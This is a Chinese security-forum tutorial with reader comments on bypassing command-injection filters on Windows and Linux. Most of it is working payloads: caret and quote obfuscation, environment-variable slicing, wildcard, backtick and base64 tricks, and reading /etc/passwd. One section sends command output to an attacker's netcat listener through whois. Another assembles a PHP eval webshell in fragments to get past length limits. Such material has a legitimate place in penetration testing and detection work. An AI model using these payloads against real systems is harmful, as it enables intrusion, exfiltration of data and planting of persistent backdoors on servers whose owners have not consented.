关于命令执行漏洞绕过过滤的讨论

urfyyyy   ·   发表于 2020-06-07 22:27:14   ·   技术文章

前言

今天和各位大佬一起发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。

一、windows下

1.1 符号与命令的关系

在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写

  1. whoami //正常执行
  2. w"h"o"a"m"i //正常执行
  3. w"h"o"a"m"i" //正常执行
  4. wh""o^a^mi //正常执行
  5. wh""o^am"i //正常执行
  6. ((((Wh^o^am""i)))) //正常执行



当然你可以加无数个”但不能同时连续加2个^符号,因为^号是cmd中的转义符,跟在他后面的符号会被转义

  1. w"""""""""""""hoami //正常执行
  2. w"""""""""""""hoa^m""i //正常执行
  3. w"""""""""""""hoa^^m""i //执行错误


如果在命令执行的时候遇到了拦截命令的关键字,那么就可以使用这种方式绕过啦。

1.2 了解set命令和windows变量

我们再了解一下cmd中的set命令和%符号的含义
首先set命令可以用来设置一个变量(环境变量也是变量哦~),那么%符号如下图

  1. set a=1 //设置变量a,值为1
  2. echo a //此时输出结果为"a"
  3. echo %a% //此时输出结果为"1"


可以明显的看出,用两个%括起来的变量,会引用其变量内的值。那也就是说:

  1. set a=whoami //设置变量a的值为whoami
  2. %a% //引用变量a的值,直接执行了whoami命令


这样就可以执行命令了,又或者还可以

  1. set a=who
  2. set b=ami
  3. %a%%b% //正常执行whoami
  4. set a=w""ho
  5. set b=a^mi
  6. %a%%b% //根据前一知识点进行组合,正常执行whoami
  7. set a=ser&& set b=ne&& set c=t u && call %b%%c%%a%
  8. //在变量中设置空格,最后调用变量来执行命令


通常我们也可以自定义一个或者多个环境变量,利用环境变量值中的字符,提取并拼接出最终想要的cmd命令。如:
Cmd /C "set envar=net user && call echo %envar%"
可以拼接出cmd命令:net user


也可以定义多个环境变量进行拼接命令串,提高静态分析的复杂度:
cmd /c "set envar1=ser&& set envar2=ne&& set envar3=t u&&call echo %envar2%%envar3%%envar1%"

cmd命令的“/C”参数,Cmd /C “string”表示:执行字符串string指定的命令,然后终止。
而启用延迟的环境变量扩展,经常使用 cmd.exe的 /V:ON参数,
/V:ON参数启用时,可以不使用call命令来扩展变量,使用 %var%!var! 来扩展变量,!var!可以用来代替%var%,也就是可以使用感叹号字符来替代运行时的环境变量值。后面介绍For循环时会需要开启/V:参数延迟变量扩展方式。

1.3 windows进阶,切割字符串!

再进阶一下,命令行有没有类似php或者python之类的语言中的截取字符串的用法呢,当然也是有的。还拿刚才的whoami来举例

  1. %a:~0% //取出a的值中的所有字符
  2. 此时正常执行whoami
  3. %a:~0,6% //取出a的值,从第0个位置开始,取6个值
  4. 此时因为whoami总共就6个字符,所以取出后正常执行whoami
  5. %a:~0,5% //取5个值,whoam无此命令
  6. %a:~0,4% //取4个值,whoa无此命令


从上图可以看出,截取字符串的语法就是
%变量名:~x,y%
即对变量从第x个元素开始提取,总共取y个字符。
当然也可以写-x,-y,从后往前取
写作-x,可取从后往前数第x位的字符开始,一直到字符的末尾
-y来决定少取几个字符

继续操作
首先set看一下目前有哪些变量可以给我们用呢

第一个a=whoami可以暂时先忽略,是我自己设置的。
我自己电脑上的环境变量还是挺多的,那我几乎可以用这种方式执行任何命令,因为这些变量的值,几乎都有26个字母在了
从简单的开始,如果命令执行不允许空格,被过滤,那么可以

  1. net%CommonProgramFiles:~10,1%user


CommonProgramFiles=C:\Program Files\Common Files
从CommonProgramFiles这个变量中截取,从第10个字符开始,截取后面一个字符,那这个空格就被截取到了(也就是Program和Files中间的那个空格),net user正常执行,当然了,还可以配合符号一起使用

  1. n^et%CommonProgramFiles:~10,1%us^er


再列出C盘根目录

  1. d^i^r%CommonProgramFiles:~10,1%%commonprogramfiles:~0,3%
  2. //~10,1对应空格,~0,3对应"C:\"


那假如环境变量里没有我们需要的字符怎么办呢,那就自己设置呗

  1. set TJ=a bcde/$@\";fgphvlrequst?
  2. //比如上面这段组合成一个php一句话不难吧?


看到这里,聪明的你应该已经学会如何使用这种方式来给网站目录里写个webshell了吧。

1.4 逻辑运算符在绕过中的作用

继续往下,相信所有人都知道,|在cmd中,可以连接命令,且只会执行后面那条命令

  1. whoami | ping www.baidu.com
  2. ping www.baidu.com | wh""oam^i
  3. //两条命令都只会执行后面的


而||符号的情况下,只有前面的命令失败,才会执行后面的语句

  1. ping 127.0.0.1 || whoami //不执行whoami
  2. ping xxx. || whoami //执行whoami


而&符号,前面的命令可以成功也可以失败,都会执行后面的命令,其实也可以说是只要有一条命令能执行就可以了,但whoami放在前面基本都会被检测

  1. ping 127.0.0.1 & whoami //执行whoami
  2. ping xxx. & whoami //执行whoami


而&&符号就必须两条命令都为真才可以了

  1. ping www.baidu.com -n 1 && whoami //执行whoami
  2. ping www && whoami //不执行whoami


1.5利用For循环拼接命令

For循环经常被用来混淆处理cmd命令,使得cmd命令看起来复杂且难以检测。最常用的For循环参数有 /L,/F参数。
FOR 参数 %变量名 IN (相关文件或命令) DO 执行的命令


for /L %variable in (start,step,end) do command [command-parameters]
该命令表示以增量形式从开始到结束的一个数字序列。
使用迭代变量设置起始值(start).
然后逐步执行一组范围的值,直到该值超过所设置的终止值 (end)。
/L 将通过对start与end进行比较来执行迭代变量。
如果start小于end,就会执行该命令,否则命令解释程序退出此循环。
还可以使用负的 step以递减数值的方式逐步执行此范围内的值。
例如,(1,1,5) 生成序列 1 2 3 4 5,
而 (5,-1,1) 则生成序列 (5 4 3 2 1)。
命令cmd /C "for /L %i in (1,1,5) do start cmd"
会执行打开5个cmd窗口。

/F参数: 是最强大的命令,用来处理文件和一些命令的输出结果。

  1. FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
  2. FOR /F ["options"] %variable IN ("string") DO command [command-parameters]
  3. FOR /F ["options"] %variable IN ('command') DO command [command-parameters]

(file-set) 为文件名,for会依次将file-set中的文件打开,并且在进行到下一个文件之前将每个文件读取到内存,按照每一行分成一个一个的元素,忽略空白行。

(“string”)代表字符串,(‘command’)代表命令。

假如文件aa.txt中有如下内容:
第1行第1列 第1行第2列
第2行第1列 第2行第2列

要想读出aa.txt中的内容,可以用for /F %i in (aa.txt) do echo %i

如果去掉/F参数则只会输出aa.txt,并不会读取其中的内容。

先从括号执行,因为含有参数/F,所以for会先打开aa.txt,然后读出aa.txt里面的所有内容,把它作为一个集合,并且以每一行作为一个元素。

由上图可见,并没有输出第二列的内容.
原因是如果没有指定"delims=符号列表"这个开关
那么for /F语句会默认以空格键或Tab键作为分隔符。
For /F是以行为单位来处理文本文件的,如果我们想把每一行再分解成更小的内容,就使用delimstokens选项。delims用来告诉for每一行用什么作为分隔符,默认分隔符是空格和Tab键。
for /F "delims= " %i in (aa.txt) do echo %i
delims设置为空格,是将每个元素以空格分割,默认只取分割之后的第一个元素。如果我们想得到第二列数据,就要用到tokens=2,来指定通过delims将每一行分成更小的元素时,要取出哪一个或哪几个元素:
for /F "tokens=2 delims= " %i in (aa.txt) do echo %i

二、进入linux

2.1 linux下的符号和逻辑运算符

这个时候有好奇的观众朋友就要问了,那对方服务器是linux的话怎么办呢?
道理也是相同的

  1. a=who
  2. b=ami
  3. $a$b


只不过windows的cmd下取变量值需要用两个%,linux下需要用$
那么我们又可以怎么组合呢,接着来看
Linux下用分号表示命令结束后执行后面的命令,无论前面的命令是否成功

  1. ping www. ; whoami
  2. echo tj ; whoami


符号|在linux中,可以连接命令,和win一样,也只会执行后面那条命令
其他符号如|| 、& 、&&和windows都是一样,不再过多赘述
那么让我们根据以上两点进行一个结合

  1. t=l; j=s; i=" -al"; $t$j$i

2.2 利用未被过滤的命令,一个例子!

哥哥们看图好了

  1. 自己服务器中:nc -lvvp 端口
  2. payload发送给对方:whois -h ip -p 端口 `命令` //``为反引号
  3. //下图以自身服务器的1234端口作演示,实际情况根据个人更改




使用whois来执行命令和传输文件
在实际的攻击场景中,可以在自己的攻击服务器上用nc监听一个公网端口,然后在存在命令执行漏洞的网站中发送payload请求,
对它使用whois命令使其命令执行结果返回给nc监听的端口,从而在自己服务器中查看

2.3 linux进阶,符号之间的组合

继续说回来,刚才我说了,windows下双引号和幂运算符号都不会影响命令的执行,linux也同理,如下图

  1. wh\oami
  2. wh$1oami
  3. who$@ami
  4. whoa$*mi


在绕过时,不管是windows还是linux,都可以自写fuzz脚本来进行测试

在linux中?扮演的角色是匹配任意一个字符,用?来绕过限制

  1. which whoami //找到whoami路径
  2. /u?r/?in/wh?am?
  3. which ifconfig //找到ifconfig
  4. /us?/sbin/if?onfig


同理可得,星号*在linux中用来代表一个或多个任何字符,包括空字符

  1. /*/bin/wh*mi
  2. /us*/*in/who*mi


组合起来!

  1. /*s?/*?n/w?o*i

2.4 linux深入,命令中的命令

Linux中,反引号的作用是把括起来的字符当做命令执行

  1. 666`whoami`666
  2. 666`\whoami`666
  3. //命令执行后的结果在2个666中间


至于第二条命令为什么加个\上面已经解释过了
我们再次组合起来

  1. w`\saldkj2190`ho`\12wsa2`am`\foj11`i
  2. wh$(70shuai)oa$(fengfeng)mi

2.5 利用linux中的环境变量

linux是否能像windows那样,使用环境变量里的字符执行变量呢,当然也是可以的。我就喜欢把一个命令写的好长,让别人看不懂,这样就感觉很厉害的样子
首先echo $PATH

Linux下严格区分大小写,不可以写成$path,但windows可以,细心的小伙伴可能发现前面windows下我写过CommonProgramFiles,也写过commonprogramfiles
接着我们来截取字符串,我懒得数
echo ${#PATH}

长度为145-1=144
如果我现在要查看/root/目录下的123.txt文件,就可以像下图一样操作
cat ${PATH:136:6}123.txt


那么相信让你拼接成想要的命令都不难吧,至于怎么设置变量然后去引用,不过多赘述,道理都是相同的,我找字符找的眼睛快瞎了
${PATH:91:1}h${PATH:139:1}a${PATH:103:1}${PATH:143:1}

2.6 使用大括号绕过空格过滤

在linux下我们还可以使用大花括号来绕过空格的限制,比如ls -alt命令中间的空格
{ls,-alt}

再比如cat /etc/passwd命令中间的空格
{cat,/etc/passwd}

2.7 了解重定向符号在绕过中的作用

我们还可以使用<>来绕过空格。请仔细看执行后的效果。linux中,小于号<表示的是输入重定向,就是把<后面跟的文件取代键盘作为新的输入设备,而>大于号是输出重定向,比如一条命令,默认是将结果输出到屏幕。但可以用>来将输出重定向,用后面的文件来取代屏幕,将输出保存进文件里
ls<>alt

2.8 linux中特殊的base64编码

我们还可以在自己的linux系统中将命令进行base64编码,然后再拿去目标请求中命令执行,使用base64的-d参数解码。

  1. echo whoami|base64 //先输出whoami的base64编码
  2. `echo dwhvYW1pCg==|base64 -d` //将其base64解码


再次强调用反引号括起来的值会被当做命令执行

三、一个有趣的例子

咱们再根据base64进行一次发散思维。如果某处存在命令执行但是限制了长度,我们可以利用这种方式来写一个密码为123的webshell一句话木马。

  1. echo "<?php @eval($_POST[123]);?>" | base64
  2. //输出一句话的base64编码
  1. echo -n PD>a;
  2. echo -n 9w>b;
  3. echo -n aH>c;
  4. echo -n Ag>d;
  5. echo -n QG>e;
  6. echo -n V2>f;
  7. echo -n YW>g;
  8. echo -n wo>h;
  9. echo -n JF>i;
  10. echo -n 9Q>j;
  11. echo -n T1>k;
  12. echo -n NU>l;
  13. echo -n Wz>m;
  14. echo -n Ey>n;
  15. echo -n M1>o;
  16. echo -n 0p>p;
  17. echo -n Oz>q;
  18. echo -n 8+>r;



然后组合base64解码并生成php文件

  1. cat a b>s;
  2. cat s c>b;
  3. cat b d>s;
  4. cat s e>a;
  5. cat a f>s;
  6. cat s g>a;
  7. cat a h>s;
  8. cat s i>a;
  9. cat a j>s;
  10. cat s k>a;
  11. cat a l>s;
  12. cat s m>a;
  13. cat a n>s;
  14. cat s o>a;
  15. cat a p>s;
  16. cat s q>a;
  17. cat a r>s;

  1. base64 -d s>z;
  2. cp z tj.php;



大体思路就是用echo不断写入或者也可以用>>来追加写入,拼接成一个文件,最后cp或者mv成一个文件
echo -n是令其后面不会加入自动换行,方便拼接。逐步解释要写很多,建议有点懵的哥哥一句一句执行,然后依次查看结果

那在写shell的时候命令被过滤了怎么办呢,那就回到刚才的办法中尝试绕过啦

总结

在实际绕过中,可以用多种方式来组合测试进行绕过,可以看出本篇多次使用各种组合来执行命令,主要是希望哥哥们多去尝试,发散思维

参考

以Emotet为例深入分析CMD命令混淆技术
模糊命令行检测

用户名金币积分时间理由
君叹 4.00 0 2022-07-07 23:11:55 一个受益终生的帖子~~
奖励系统 50.00 0 2020-06-13 16:04:47 投稿满 5 赞奖励
admin 200.00 0 2020-06-11 14:02:48 核心文章审核通过
admin 200.00 0 2020-06-11 14:02:45 核心文章

打赏我,让我更有动力~

13 条回复   |  直到 2022-8-15 | 4823 次浏览

王家大饼
发表于 2022-5-27

w为什么who”a^mi不行呢

评论列表

  • 加载数据中...

编写评论内容

urfyyyy
发表于 2020-6-11

tql

评论列表

  • 加载数据中...

编写评论内容

骚骑
发表于 2020-6-11

镜哥tql

评论列表

  • 加载数据中...

编写评论内容

无心法师
发表于 2020-6-11

tql

评论列表

  • 加载数据中...

编写评论内容

urfyyyy
发表于 2020-6-11

老铁们没毛病,点赞,双击666
下次给大家表演三口一只猪

评论列表

  • 加载数据中...

编写评论内容

treenewbee
发表于 2020-6-11

全是干货一时半会儿也看不完

评论列表

  • 加载数据中...

编写评论内容

l836918621
发表于 2020-6-12

tql!!

评论列表

  • 加载数据中...

编写评论内容

mq
发表于 2020-6-12

一键三连 收藏夹里吃灰完毕

评论列表

  • 加载数据中...

编写评论内容

黑鬼
发表于 2020-6-12

tql 是什么?

评论列表

  • 加载数据中...

编写评论内容

黑鬼
发表于 2020-6-13

看到 net%CommonProgramFiles:~10,1%user 这里搞明白前面介绍的小知识点的具体用处了。

但是还不知道这种攻击方式的具体使用场景。都已经可以在目标机器的 cmd 窗口敲命令了,为啥不直接敲 net user 呢?萌新求问。

评论列表

  • 加载数据中...

编写评论内容

昊天上帝
发表于 2022-3-21

牛!都是干货

评论列表

  • 加载数据中...

编写评论内容

君叹
发表于 2022-7-8

1.4那里,| 前面的内容也会执行, | 是只回显后面命令的执行结果,可以试一下 echo 1 > 1.txt | echo 2 这条命令

评论列表

  • 加载数据中...

编写评论内容

18270072381
发表于 2022-8-15

设了要执行的命令变量后直接下一行输入%变量名%,不用再echo %变量名%,刚踩了坑试了半天,怪自己没看仔细大佬写的文章。

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.